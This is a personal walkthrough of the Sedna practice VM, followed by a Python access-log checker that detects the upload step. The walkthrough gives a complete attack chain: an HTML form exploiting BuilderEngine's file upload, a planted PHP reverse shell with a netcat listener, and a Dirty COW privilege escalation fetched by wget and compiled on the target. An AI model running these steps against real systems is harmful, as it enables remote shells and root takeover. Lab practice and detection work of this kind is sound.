These are my notes from running through the Sedna vulnerable VM.
Run Burp's Discover Content to map out the application. You can also run Nikto to look for known vulnerable files and misconfigurations.
Observe /license.txt - it will inform us that the target web application is running BuilderEngine.
Search for an exploit we can use:
searchsploit builderengine
View the source for the exploit:
searchsploit -x 40390
Copy the exploit code into exploit.html:
<html>
  <body>
    <form
      method="post"
      action="http://<vulnerable ip>/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
      enctype="multipart/form-data"
    >
      <input type="file" name="files[]" />
      <input type="submit" value="send" />
    </form>
  </body>
</html>
Host it:
python -m SimpleHTTPServer 8000 # make sure exploit.html is in this directory
In a web browser: http://127.0.0.1:8000/exploit.html
Modify the Laudanum PHP reverse shell so its IP address and port match our attacker machine. We can get it from here.
Upload laudanum backdoor through exploit.html:
Click Choose File, select php-reverse-shell.php, then click send.
Start listener on attacker:
nc -lvp 8888
Initiate connection:
http://<vulnerable ip>/files/php-reverse-shell.php
After getting the reverse shell:
python -c 'import pty;pty.spawn("/bin/bash")' # get real shell
To elevate our privileges, we'll use the Dirty COW exploit. Get it and compile it:
cd /tmp && wget https://www.exploit-db.com/download/40839 && mv 40839 40839.c && gcc -pthread -o dirty 40839.c -lcrypt
Run it:
./dirty nicepassword
Access the system:
ssh firefart@192.168.1.182
For stability, run this immediately once you’re in:
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
The flags can be found in:
/var/www/flag.txt
/root/flag.txt
/etc/tomcat7/tomcat-users.xml
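As an added defensive example (not part of the original notes): a small Python checker that runs over web-server access-log lines and flags a client that POSTs to the BuilderEngine jquery-file-upload handler and then requests a .php file from /files/, which is exactly the trace the upload step above leaves. The log lines, client IPs and the script-extension list are constructed assumptions.

```python
import re

# Combined-log style lines, constructed as sample input (not captured from the VM).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2017:10:01:02 +0000] "GET /license.txt HTTP/1.1" 200 1043
10.0.0.5 - - [12/Mar/2017:10:01:09 +0000] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 231
10.0.0.5 - - [12/Mar/2017:10:01:15 +0000] "GET /files/php-reverse-shell.php HTTP/1.1" 200 0
10.0.0.9 - - [12/Mar/2017:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2017:10:05:03 +0000] "GET /files/logo.png HTTP/1.1" 200 8876
"""

# ip, ident, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

UPLOAD_HANDLER = "/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
UPLOAD_DIR = "/files/"
SCRIPT_EXTS = (".php", ".phtml", ".phar")  # assumed list of server-executed extensions


def parse_line(line):
    """Return (ip, method, path, status) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, method, path, status = m.groups()
    path = path.split("?", 1)[0]  # drop any query string before matching
    return ip, method, path, int(status)


def find_upload_abuse(log_text):
    """Flag clients that POST to the upload handler and later fetch a script
    from the upload directory. Returns (ip, executed_path) pairs in log order."""
    uploaders = set()
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, _status = rec
        if method == "POST" and path == UPLOAD_HANDLER:
            uploaders.add(ip)
        elif (method == "GET" and ip in uploaders
              and path.startswith(UPLOAD_DIR)
              and path.lower().endswith(SCRIPT_EXTS)):
            hits.append((ip, path))
    return hits


if __name__ == "__main__":
    for ip, path in find_upload_abuse(SAMPLE_LOG):
        print(f"ALERT: {ip} uploaded via {UPLOAD_HANDLER} then executed {path}")
```

The same check can be pointed at a real access log by replacing SAMPLE_LOG with the file contents; the upload handler itself should also be removed or put behind authentication rather than only monitored.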